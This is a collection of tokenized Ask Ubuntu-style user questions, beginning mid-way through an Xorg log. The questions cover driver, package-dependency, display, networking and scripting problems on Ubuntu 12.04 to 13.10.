class : x.org xinput driver , version 16.0 [ 53.455 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad' [ 53.455 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 53.455 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 53.455 ] ( ** ) option `` device '' `` /dev/input/event5 '' [ .. ] [ 53.469 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio1/serio2/input/input7/event7 '' [ 53.469 ] ( ii ) xinput : adding extended input device `` tpps/2 ibm trackpoint '' ( type : mouse , id 11 ) [ .. ] [ 53.470 ] ( ii ) no input driver specified , ignoring this device . [ 53.470 ] ( ii ) this device may have been added with another device file . [ 53.472 ] ( ii ) config/udev : adding input device thinkpad extra buttons ( /dev/input/event6 ) [ 53.472 ] ( ** ) thinkpad extra buttons : applying inputclass `` evdev keyboard catchall '' [ 53.472 ] ( ii ) using input driver 'evdev ' for 'thinkpad extra buttons' [ 53.472 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 53.472 ] ( ** ) thinkpad extra buttons : always reports core events [ 53.472 ] ( ** ) evdev : thinkpad extra buttons : device : `` /dev/input/event6 '' [ 53.472 ] ( -- ) evdev : thinkpad extra buttons : vendor 0x17aa product 0x5054 [ 53.472 ] ( -- ) evdev : thinkpad extra buttons : found keys [ 53.472 ] ( ii ) evdev : thinkpad extra buttons : configuring as keyboard [ 53.472 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/thinkpad_acpi/input/input6/event6 '' [ 53.472 ] ( ii ) xinput : adding extended input device `` thinkpad extra buttons '' ( type : keyboard , id 12 ) [ 53.472 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 53.472 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 53.472 ] ( ** ) option `` xkb_layout '' `` us '' background : this question is on the back of nvidia x server flickers , hangs and segfaults on start-up . i am able to start x only if i install the proprietary nvidia graphics for my graphics card ( say , nvidia-304 ) in one kernel ( 3.2.0-23-generic ) , then boot in a different kernel ( 3.2.0-57-generic ) . it clearly uses some fallback driver , but i ca n't understand if it 's nouveau or something else . edit1 : as suggested : liv @ malou-laptop : ~ $ lspci -v [ .. ] 01:00.0 vga compatible controller : nvidia corporation g86m [ quadro nvs 140m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo thinkpad t61 [ .. ] kernel modules : nouveau , nvidiafb [ .. ] but strangely , these modules do n't seem to be in use : root @ malou-laptop : /home/liv # lsmod | grep -i nouveau root @ malou-laptop : /home/liv # lsmod | grep -i nvidia although they 're clearly available : liv @ malou-laptop : ~ $ modprobe -l | grep nouveau kernel/drivers/gpu/drm/nouveau/nouveau.ko liv @ malou-laptop : ~ $ modprobe -l | grep nvidia kernel/drivers/video/nvidia/nvidiafb.ko
403344	how can i fix the pager ( window manager warning in .xsession-errors ) ?	should i do something with the following entries in .xsession-errors ? ostrzeżenie menedżera okien : buggy client sent a _net_active_window message with a timestamp of 0 for 0x4400004 ( .xsession- ) ostrzeżenie menedżera okien : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . ostrzeżenie menedżera okien : received a net_current_desktop message from a broken ( outdated ) client who sent a 0 timestamp unity-2d-shell : [ warning ] wnck : received a timestamp of 0 ; window activation may not function properly . it is ubuntu 12.04 lts on amd radeon hd 7340 driven by fglrx . external monitor connected via hdmi to a notebook . after a broken fglrx installation i’ve reinstalled all packages in synaptic related to searches unity , glx , libgl , fglrx in order to get fglrx to work with unity , by the way solving few other issues . unfortunately , i’ve just started paying attention to .xsession-errors . and a longer one : ** ( nautilus:3105 ) : critical ** : nautilus_menu_provider_get_background_items : assertion `nautilus_is_menu_provider ( provider ) ' failed ** ( nautilus:3105 ) : critical ** : nautilus_menu_provider_get_background_items : assertion `nautilus_is_menu_provider ( provider ) ' failed nautilus-share-message : called `` net usershare info '' but it failed : `` net usershare '' zwrócił błąd 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error nie ma takiego pliku ani katalogu please ask your system administrator to enable user sharing . unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.application '' w obiekcie w ścieżce /org/ayatana/bamf/application829906520 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application829906520 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.application '' w obiekcie w ścieżce /org/ayatana/bamf/application829906520 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application829906520 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application829906520 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application829906520 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application829906520 '' ) ( gnome-settings-daemon:3059 ) : color-plugin-warning ** : done switch to new account , reload devices ( gnome-settings-daemon:3059 ) : color-plugin-warning ** : unable to get edid for xrandr-lvds : unable to get edid for output ( gnome-settings-daemon:3059 ) : color-plugin-warning ** : failed to reset xrandr-lvds gamma tables : gamma size is zero ostrzeżenie menedżera okien : received a net_current_desktop message from a broken ( outdated ) client who sent a 0 timestamp unity-2d-shell : [ warning ] wnck : received a timestamp of 0 ; window activation may not function properly . ostrzeżenie menedżera okien : buggy client sent a _net_active_window message with a timestamp of 0 for 0x4400004 ( .xsession- ) ostrzeżenie menedżera okien : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . ostrzeżenie menedżera okien : received a net_current_desktop message from a broken ( outdated ) client who sent a 0 timestamp unity-2d-shell : [ warning ] wnck : received a timestamp of 0 ; window activation may not function properly . ostrzeżenie menedżera okien : buggy client sent a _net_active_window message with a timestamp of 0 for 0x4400004 ( .xsession- ) ostrzeżenie menedżera okien : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.application '' w obiekcie w ścieżce /org/ayatana/bamf/application311805604 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application311805604 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.application '' w obiekcie w ścieżce /org/ayatana/bamf/application311805604 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application311805604 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application311805604 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application311805604 '' ) unity-2d-shell : [ warning ] qdbuserror ( `` org.freedesktop.dbus.error.unknownmethod '' , `` brak interfejsu `` org.ayatana.bamf.view '' w obiekcie w ścieżce /org/ayatana/bamf/application311805604 '' ) ostrzeżenie menedżera okien : received a net_current_desktop message from a broken ( outdated ) client who sent a 0 timestamp unity-2d-shell : [ warning ] wnck : received a timestamp of 0 ; window activation may not function properly .
403349	php broken , `` held broken packages '' error on install	i 've completely destroyed everything and now php wont install . i had php5.4 and everything was great . i then needed to run magento locally which wasnt working . i saw one of the requirements was php5.3 so i downgraded using a script i found online but then pdo wasnt working . i stuffed about for a few hours following what people said online , eventually nothing was working so i purged php to do a fresh install of php5.4 to start again from scratch and figure out my problems . after i purged , i came to reinstall php5 using apt-get install php5 . once the script ran i got the following output : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5 : depends : libapache2-mod-php5 ( > = 5.4.9-4ubuntu2.4 ) but 5.3.10-1ubuntu3 is to be installed or libapache2-mod-php5filter ( > = 5.4.9-4ubuntu2.4 ) but it is not going to be installed or php5-cgi ( > = 5.4.9-4ubuntu2.4 ) but it is not going to be installed or php5-fpm ( > = 5.4.9-4ubuntu2.4 ) but it is not going to be installed depends : php5-common ( > = 5.4.9-4ubuntu2.4 ) but 5.3.10-1ubuntu3 is to be installed e : unable to correct problems , you have held broken packages . i then googled for ages and ran commands like clean , update , upgrade , -f install and a few others . i come back to install php and i get the same error . how can i reinstall php so it works again .
403350	weird shell script error : invalid option return : usage : return [ n ]	this programme checks if a certain book title exist by matching user input of book title and book author . function removebook_option ( ) { echo -n `` title : `` read title_input2 echo -n `` author : `` read author_input2 checkexist $ title_input2 $ author_input2 error= $ ? echo `` $ error '' if [ $ error ! = -1 ] ; then # removebook echo `` new book title $ title_input removed successfully '' else echo `` book does not exist '' fi } function checkexist ( ) { counter=0 for x in $ { title [ @ ] } do for y in $ { author [ @ ] } do if [ $ x == $ 1 ] & & [ $ y == $ 2 ] ; then error= $ counter return `` $ error '' fi done counter= $ ( ( counter+1 ) ) done error=-1 return `` $ error '' } title= ( foo1 foo2 ) author= ( bar1 bar2 ) removebook_option i am getting a very weird error , where function checkexist ( ) returns 2 instead of -1 when there isnt a match which happens when returning value error=-1 line 43 : return : -1 : invalid option return : usage : return [ n ] edit : for reasons unknown , i can only return values from 0-255 , does anyone know how to return negative values ? ? you can try to input incorrect data to see the weird error i need help resolving this issue thanks ! ! ! !
403351	photoshop cs6 in wine fail to load the glu32.dll	system : ubuntu 12.04 environment : wine1.7.8 software : photoshop cs6 it is easy to crash when i use the ps , and i find the problem is that the software failed to load `` glu32.dll '' .but i find the glu32.dll in the ~/.wine/photoshop/driver_c/ ... /windows/system32/glu32.dll . what 's the problem ?
403352	problem with system updates after installing rhythmbox 3 via ppa	i installed rhythmbox 3 per these instructions on my 13.10 machine : http : //www.webupd8.org/2013/10/install-rhythmbox-30-in-ubuntu-1310-or.html and now when i try to update , i get the following error : ( reading database ... 201995 files and directories currently installed . ) preparing to replace librhythmbox-core7 2.99.1-0ubuntu1 ( using ... /librhythmbox-core7_3.0.1-0~13.10~ppa1_amd64.deb ) ... unpacking replacement librhythmbox-core7 ... dpkg : error processing /var/cache/apt/archives/librhythmbox-core7_3.0.1-0~13.10~ppa1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/librhythmbox-core.so.8.0.0 ' , which is also in package librhythmbox-core8 3.0.1-1ubuntu5~ppa0 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/librhythmbox-core7_3.0.1-0~13.10~ppa1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
403359	how to solve linux-firmware package upgrade problem ?	if i do an apt-get upgrade i get the following error : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : linux-firmware 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/23.3 mb of archives . after this operation , 347 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 234639 files and directories currently installed . ) preparing to replace linux-firmware 1.79.1 ( using ... /linux-firmware_1.79.9_all.deb ) ... unpacking replacement linux-firmware ... dpkg : error processing /var/cache/apt/archives/linux-firmware_1.79.9_all.deb ( -- unpack ) : trying to overwrite '/lib/firmware/ar3k/ramps_0x31010000_40.dfu ' , which is also in package bt-dw1705-firmware 0.1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-firmware_1.79.9_all.deb i work with a fresh installation of ubuntu 12.04 and this was my first step after starting up the computer for the first time . what can i do to resolve this issue ? i 'm working on a dell laptop which comes with ubuntu .
403360	dynamic dns advice for a home server on a .co.uk domain	i have the following setup : a home server running ubuntu server 12.04 a d-link dsl-2780 capable of dynamic dns routing to www.dyndns.org , www.no-ip.com , zoneedit.com a domain purchased with gandi.com which does not run a dynamic dns service but does have 'dns zones' i 've done a bit of reading about how to connect my ip - and thus presumably my home server - to my pre-purchased domain name . some suggest installing a custom script which will communicate with the gandi zone files via the api and auto update . others ( possibly out of date ) suggest using a free service provided by dyndns or no-ip . i 'm retisant to install any more code on my server than i have to in the spirit of trying to be secure whilst i learn as much as i can about what every line does . so preferably an external service would be good ( correct me if i 'm being stupid here ) . i ca n't seem to find a 'free dynamic dns service ' that applies to me in the way these guides state . perhaps i am confused but no-ip.com but as my domain ends in .co.uk i only seem to be able to use the paid for services ( which i do n't object to but would then prefer to start shopping around ) . might someone let me know if times have moved on and free services for .co.uk are currently not available , or if i 'm likely misunderstanding something about managing hosts / domains . i then assume once i 've resolved this it should be as simple as pointing my router to my dns account , which in turn will point to my gandi-domain , thus allowing me to get to my home server via my domain name !
403362	bluetooth device is not detected in hp 15e021tx notebook pc with ubuntu 12.04.3 ( x64 )	i recently bought a hp 15e021tx notebook pc . i want to use ubuntu with it . i 've downloaded 12.4.3 .iso and running it using live usb . but the problem is that bluetooth is not detected while wi-fi is automatically detected . please help me so that i can use bluetooth properly with ubuntu . my system is x64 bit .
403363	this video is currently unavailable - youtube	i 'm having problems with playing some youtube videos but not all of them . i have tried using the html5 youtube player according to this answer but that did n't work and i have issued following command : sudo apt-get install chromium-codecs-ffmpeg-extra according to this answer but that does n't work either . i 'm on 12.04 and use chromium . in midori everything works so it 's no biggy but i still find it weird . here are some of the videos that do n't work : http : //www.youtube.com/watch ? v=w_oxmoegy2e http : //www.youtube.com/watch ? v=t-ikpz -- ymk and here is some that do work : http : //www.youtube.com/watch ? v=kcl3ho6_gbg http : //www.youtube.com/watch ? v=sllp8dq608a
403366	nfs fails to mount home folder if other shares exist	i have a virtual machine that i use only for internal development , so i 'm not really worried about security . in that machine , i have the following export settings : /var/www * ( rw , sync , fsid=1000 , no_subtree_check ) /home/my_user * ( rw , sync , fsid=1000 , no_subtree_check ) /etc * ( rw , sync , fsid=0 , no_subtree_check ) both /var/www and /etc are mounted in the right way , but when i try to mount /home/my_user the system mounts /var/www again , ignoring the /home/my_user nfs share in my workstation 's fstab , i have : my.ip.address : /var/www /mount_folder/www nfs defaults , auto , nobootwait , nofail my.ip.address : /home/my_user /mount_folder/home nfs defaults , auto , nobootwait , nofail my.ip.address : /etc /mount_folder/etc nfs defaults , auto , nobootwait , nofail does anybody have any idea why /home/my_user is being mounted as /var/www ?
403369	configure client vnc by remmina : incoming connection vs virtual network computing	which should i use to configure vnc client by remmina : vnc-incoming connection or vnc-virtual network computing
403372	why some web pages/files saved to ntfs can be accessed in ubuntu but not in windows os ?	i 'm having problem opening files which i saved in ubuntu with firefox web browsers `` save page as '' in a ntfs partition . the files can be viewed/accessed ( using web browsers or text editors or word processors ) offline on ubuntu but not in windows . what 's the reason ? how do i fix this ?
403373	how to download easygui for python3.3 ?	i have python 2.7 and python 3.3 in my ubuntu 13.10 system.i have easygui in-built for python2.7 but not for python3.3.but when i download the zip file of easygui and unzip it and type `` python3 setup.py install '' .it tells me permission denied why is this so.and how do i know how many python versions do i have in my system ?
403374	ubuntu missing in boot priority order	i 've ubuntu 12.04 installed as my only os on my lenovo thinkpad x1 carbon . today it would n't boot ( the screen just went black when ubuntu booted ) . i resat the bios to default and tried booting again - now 'ubuntu ' disappeared from the boot list , and i 'm not able to boot anything anymore . is there any fix for this ? it 's a pretty bad situation.. cheers , adrian
403375	install odbc connector for postgresql on ubuntu server 12.04	i try to install the odbc driver for postgresql on ubuntu server 12.04 . the purpose is to connect r ( which is also running on the server ) to the database . i somehow got stock because i did not find a very comprehensive manual on how to do this . so the first thing i did was to install the mysql database odbc driver with apt-get install libmyodbc as described here . now i think i would need to enable odbc in postgresql . so normally if you want to achieve this you have to do it when manually building postgresql . since my database is already built and everything set up i wanted to do it afterwards . postgresql-manual states that : to install the odbc you simply need to supply the -- enable-odbc option to the configure script when you are building the entire postgresql distribution . the library will then automatically be built and installed with the rest of the programs . if you forget that option or want to build the odbc driver later you can change into the directory src/interfaces/odbc and do make and make install there . ok . so source does n't come with the program if you install it with apt-get so i downloaded the source from here . i followed the steps described on the website to create the directory . now , inside this directory src/interfaces/ there is no subfolder called odbc . so i also ca n't make the driver . now i googled this but i did not find any post of somebody that had a similar issue . so can anybody here please help me ? i 'm no database expert i only wa n't to set this up to work with r and postgresql . thx in advance .
403376	ubuntu touch on sgs2 korean version ( shw-m250s )	i 've an old korean sgs2 ( shw-m250s ) and i 'd like to try ubuntu touch . unfortunately the only supported version is the international one ( i9100 ) , at the same time there is the possibility to transform this korean version in an international one from a software point of view ( http : //forum.xda-developers.com/showthread.php ? t=1595225 ) . i 've another phone and this device is really only for fun , so do n't mind about damages and so on . do you think i can try the i9100 installation procedure directly ( https : //wiki.ubuntu.com/touch/devices/i9100 ) or should i run before the transform procedure linked above ? any idea/suggestion is very welcome . thank you giuseppe
403378	how to uninstall ubuntu 13.10 from pc having no other os and install windows 8.1 ?	i had windows 7 in c drive and windows 8.1 in d drive . but i installed ubuntu 13.10 and the system got formatted . i wanted to have 3 os . but lost the other two . i didnt make any partitions.now i want to uninstall ubuntu and install windows 8.1 , how to do it ? > p.s : i dont know much about partioning .
403380	triple head performance with nouveau	i 've finally got 3 displays ( laptop display + vga + displayport ) working on my thinkpad t420 optimus laptop using the nouveau driver under ubuntu 13.10 : ) however , the performance is pretty poor , if i move the mouse on the display port monitor i get ghosting , and on all monitors the cursor flickers and sometimes disappears . is there anything i can do to improve this , or should i just be quiet and be happy that i have three monitors working ? thanks .
403388	unable to install ubuntu , during installation the 'install alongside windows ' option is missing	i am currently trying to install ubuntu to run beside my current windows 7 installation . i 'm installing saucy salamander 13.10 ; during installation once booted into the live cd 4 options are offered : wipe disk , install security ( or something of the sort ) , a third that escapes me , and something else . my computer is a xps 15 l521x it has a intel core i5 , 6 gigs of ram , a 500 gigs 7200 rpm harddrive and a 32 gb cache ssd . it has integrated and dedicated graphics ( if that 's relevant ) in gparted all my partitions are visible , inclusive of my three windows partitions and an additional ssd partition -there 's also the 20 gigs of free storage for ubuntu . these partitions are also available during the installation . i have tried deleting the dmraid package from terminal but to no avail . for the ubuntu installation i shrank my main data partition which was initially 408 gb and after shrinking became about 390 gb . it 's worth mentioning that this is my first installation of linux , and i am unfamiliar with the linux lingo so if someone could explain in simple terms what to do i 'd appreciate it . thank you !
403389	any app for learning russian language ?	i want to offline learn russian ( and the base of cyrillic alphabet ) language . i tried `` openteacher '' but its do n't have any learning . what app can use for learning languages ? thanks
403390	problem building driver for uvc camera	when i was trying to install a driver for a uvc camera , i got an error : /usr/bin/ld : can not find -lasound /usr/bin/ld : can not find /lib/libpthread.so.0 inside /usr/bin/ld : can not find /usr/lib/libpthread_nonshared.a inside collect2 : ld returned 1 exit status make [ 4 ] : *** [ capture_mux ] error 1 make [ 4 ] : leaving directory `/home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/64380/mxuvc/examples' make [ 3 ] : *** [ build_bin ] error 2 make [ 3 ] : leaving directory `/home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/64380/mxuvc' make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/64380/mxuvc' make [ 1 ] : *** [ mxuvc/all ] error 2 make [ 1 ] : leaving directory `/home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/64380' make : *** [ buildall ] error 2 my first step was : ubuntu @ ubuntu : ~/me4_x86-tot-44324/me4_x86-sdk/sw $ make defconfig product_type=me4_x86 installing package -- -- -- -- -- -- > kernel-devel no package with kernel-devel package present in repositories installing package -- -- -- -- -- -- > kernel no package with kernel package present in repositories installing package -- -- -- -- -- -- > libdaemon-devel no package with libdaemon-devel package present in repositories installing package -- -- -- -- -- -- > expat-devel no package with expat-devel package present in repositories installing package -- -- -- -- -- -- > avahi-devel no package with avahi-devel package present in repositories installing package -- -- -- -- -- -- > fcgi-devel no package with fcgi-devel package present in repositories installing package -- -- -- -- -- -- > lighttpd no package with lighttpd package present in repositories installing package -- -- -- -- -- -- > alsa-lib-devel no package with alsa-lib-devel package present in repositories installing package -- -- -- -- -- -- > alsa-utils no package with alsa-utils package present in repositories installing package -- -- -- -- -- -- > libcurl-devel no package with libcurl-devel package present in repositories installing package -- -- -- -- -- -- > udev no package with udev package present in repositories installing package -- -- -- -- -- -- > libusb1-devel no package with libusb1-devel package present in repositories installing package -- -- -- -- -- -- > libusb1-static no package with libusb1-static package present in repositories installing package -- -- -- -- -- -- > glibc-static no package with glibc-static package present in repositories installing package -- -- -- -- -- -- > gcc no package with gcc package present in repositories installing package -- -- -- -- -- -- > gcc-c++ no package with gcc-c++ package present in repositories installing package -- -- -- -- -- -- > doxygen no package with doxygen package present in repositories installing package -- -- -- -- -- -- > openssl-devel no package with openssl-devel package present in repositories setting default config for me4_x86 make [ 1 ] : entering directory `/home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/host_sdk' make [ 1 ] : nothing to be done for `defconfig ' . make [ 1 ] : leaving directory `/home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/host_sdk' make [ 1 ] : entering directory `/home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/buildroot' mkdir -p /home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/buildroot/output/build/buildroot-config # # configuration written to /home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/buildroot/.config # make [ 1 ] : leaving directory `/home/ubuntu/me4_x86-tot-44324/me4_x86-sdk/sw/buildroot'
403394	cant access ubuntu after ubuntu tweak clean up	at first iâ´d like to mention that i 'm an ubuntu noob . i 'm running ubuntu 12.04 lts with windows 7. recently i 've installed and using gnome-shell instead of the classic unity enviroment . i run ubuntu tweak app in order to clean google chrome temporary cache . in this option ubuntu tweak let you clean up and other programs and stuff like thunderbird temporary cache , old ubuntu packages , something about kernel updates etc.after this action i cant access ubuntu at all . in dual-boot up screen when i click ubuntu , with linux 3.0.8-35-generic i get stuck in ubuntu first load screen ( the purple one and nothing happens . any help ?
403396	trying to install oracle 6u4 on ubuntu 13.10 and can not find the libnpjp2.so browser plugin	i need oracle 's java 6u4 to run a specific web applet for work . i 've downloaded the .bin for 64-bit linux from oracle 's website , and went through this au answer . everything seemed to be going fine , but when i went to make the symlink for the browser plugin , there is no libnpjp2.so to be found ! i tried locate libnpjp2.so to no avail . any ideas what happened here ?
403397	install gcc and g++	i tried all the commands sudo apt-get build-dep build-essential sudo apt-get install gcc sudo apt-get install g++ but all time i am getting this error . the following packages have unmet dependencies : build-essential : depends : gcc ( > = 4:4.4.3 ) but it is not going to be installed depends : g++ ( > = 4:4.4.3 ) but it is not going to be installed e : build-dependencies for build-essential could not be satisfied .
403399	e : the package libavahi-client3 : i386 needs to be reinstalled , but i ca n't find an archive for it	now i have a problem . when i try to install some programm i have a error . e : the package libavahi-client3 : i386 needs to be reinstalled , but i ca n't find an archive for it . i try : sudo dpkg -- remove -- force-remove-reinstreq libavahi-client3 dpkg : dependency problems prevent removal of libavahi-client3 : amd64 : cups depends on libavahi-client3 ( > = 0.6.16 ) . cups-browsed depends on libavahi-client3 ( > = 0.6.16 ) . telepathy-salut depends on libavahi-client3 ( > = 0.6.16 ) . cups-daemon depends on libavahi-client3 ( > = 0.6.16 ) . vino depends on libavahi-client3 ( > = 0.6.16 ) . libavahi-gobject0 : amd64 depends on libavahi-client3 ( > = 0.6.16 ) . libcups2 : amd64 depends on libavahi-client3 ( > = 0.6.16 ) . gvfs-backends depends on libavahi-client3 ( > = 0.6.16 ) . libpurple0 depends on libavahi-client3 ( > = 0.6.16 ) . libdmapsharing-3.0-2 depends on libavahi-client3 ( > = 0.6.16 ) . seahorse depends on libavahi-client3 ( > = 0.6.16 ) . avahi-utils depends on libavahi-client3 ( > = 0.6.16 ) . libsane : amd64 depends on libavahi-client3 ( > = 0.6.16 ) . sane-utils depends on libavahi-client3 ( > = 0.6.16 ) . dpkg : error processing libavahi-client3 : amd64 ( -- remove ) : dependency problems - not removing errors were encountered while processing : libavahi-client3 : amd64 how i can fix this ?
403400	how to download torrents from the command line ?	i want to download a large file through bittorrent on my server . for doing this , i downloaded the transmission command line client and the relevant .torrent file on the server , and then i run the following command : ./transmission-remote-cli the_torrent_file.torrent but i get the following error : executing : transmission-remote localhost:9091 -a the_torrent_file.torrent response : could not execute the above command : [ errno 2 ] no such file or directory i know 100 % sure that the_torrent_file.torrent exists in the present directory ( i even finished it by hitting tab ) . so which file or directory does not exist ? any tips on downloading the torrent from the command line are very welcome !
403406	automatically upgraded to developer branch	earlier i was using ubuntu 12.04 lts . i followed the below question to upgrade my system upgrade from 12.04 to 13.04 ? but it automatically upgraded to 13.10 and also some times it shows 14.04 when i tried the local terminal ( ctrl+alt+f2 ) , it showed me `` ubuntu trusty tahr '' ( developer branch ) . how do i switch back to 13.10 or to 13.04 ? or how do i disable the developer branch ?
403409	nvidia binary xorg driver in update manager	the entry `` nvidia binary xorg driver , kernel module and vdpau library '' is always displayed in the update manager that comes with ubuntu 12.04.3 lts 32-bit . however , i can not select it and install it ; how can i get rid of this entry in the update manager by installing the driver or other means ? i appreciate your help . thanks in advance p.s : the screenshot
403411	folders content in properties goes through a loop	when i select several folders and right-click properties , the content ( files and size ) takes a huge amount of time , because it keeps starting from zero . for example it counts the files ( and size ) until a certain point , then starts from zero , and so on . every time it starts to count , it appears to read a bit more files , so that eventually it gets a final value . but it takes forever . is this normal ? how can i fix it ?
403413	how can i stop the software updater from nagging me to restart ?	software updater has installed some new software . i 'm largely not interested in this fact as i just use this machine as a file server and watch everything on my tablet or windows machine . however , every time i connect to the machine , i see this : this is a window with no close button with the `` restart '' button selected by default so literally my next keypress will reboot the machine . this is almost as bad as windows 8 rebooting whenever it wants to in order to apply updates . i do n't mind it installing updates as and when it wants to but i am only ever going to restart the machine when i want to restart it . how can i stop the software updater from nagging me to restart ?
403415	help in flumotion for audio streaming	i have installed and started flumotion in ubuntu 12.04 in that i used to have live streaming audio alone i tried but it says that internal gstreamer error . posted on fri 10 jan 2014 05:51:48 pm ist . debug information : could not negotiate format gst-stream-error-quark : 11 gstbasesrc.c ( 2830 ) : gst_base_src_start ( ) : /gstpipeline : pipeline-producer-audio/gstalsasrc : src : check your filtered caps , if any please help me in rectifying this error thanks in advance
403416	how to listen live sounds from input from external sound card ?	i have an external sound card . it is connected to my laptop via usb and to piano via a jack - jack cable . i can record sounds from piano ( using audacity ) but i can not hear the sounds in the live mode . how can i enable live mode ? how can i hear the sounds while i am playing piano ? i already tried : gst-launch pulsesrc ! pulsesink and pactl load-module module-loopback latency_msec=1 but none worked as expected ...
403419	how do i make ubuntu ask for a password when logging in ?	i have installed ubuntu 13.10 and selected the option to automatically log in to my account when the laptop starts . but now i want to change it so it asks me for my password when it starts . i ca n't find any option for that .
403423	why is cvsweb not working in ubuntu server 13.10 ?	a few years ago i installed rancid for the first time , along with cvsweb , on ubuntu desktop 13.04 . i am a very frequent user of this system and used it to retreive the changes in configs of my company switches . because i needed a faster system and in the meantime i 've become more familiar with ubuntu , i installed it on the newest version of ubuntu server , ver 13.10 . the installation of rancid worked fine . the changes of the switchconfis where sent by email , so that worked ok . but cvsweb dit not work in ubuntu server 13.10 . after the install i browsed to http : ///cgi-bin/cvsweb and i got `` not found '' . i 'm already back to the lts version of ubuntu server , but i 'm still curious what i did wrong , or what has changed in apache or another depending system . in the installation process of ubuntu server 12.04 lts i only installed the components : openssh and mail . if you know the solution , i 'm willing to try i again , just to be sure my system stays up and running in the future .
403428	no display after connecting tv over hdmi on both tv and laptop screen	yesterday i wanted to watch a movie on my tv so i plugged my tv to the hdmi port of my laptop . at first it did n't show my tv as a second screen so i went to settings - > display and enabled my tv . but after that step both my laptop screen and tv screen went black even after a reboot . i tried logging in with the guest account and in that account everything is working fine which seems like it is an user setting i messed up . does someone know how i can reset this setting ? what i managed to do is login into the broken account and start a shell by super+t and use the xrandr -- query command . the output of that is screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+-32768+-32768 ( normal left inverted right x axis y axi $ 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) ( note i unplugged the tv by now ) i ran the same command on an other account and the output for that is the same except that lvds1 states '1366*768+0+0 ' . i guess this last two parameters are some kind of offset , so i can not see anything ? i am running xubuntu .
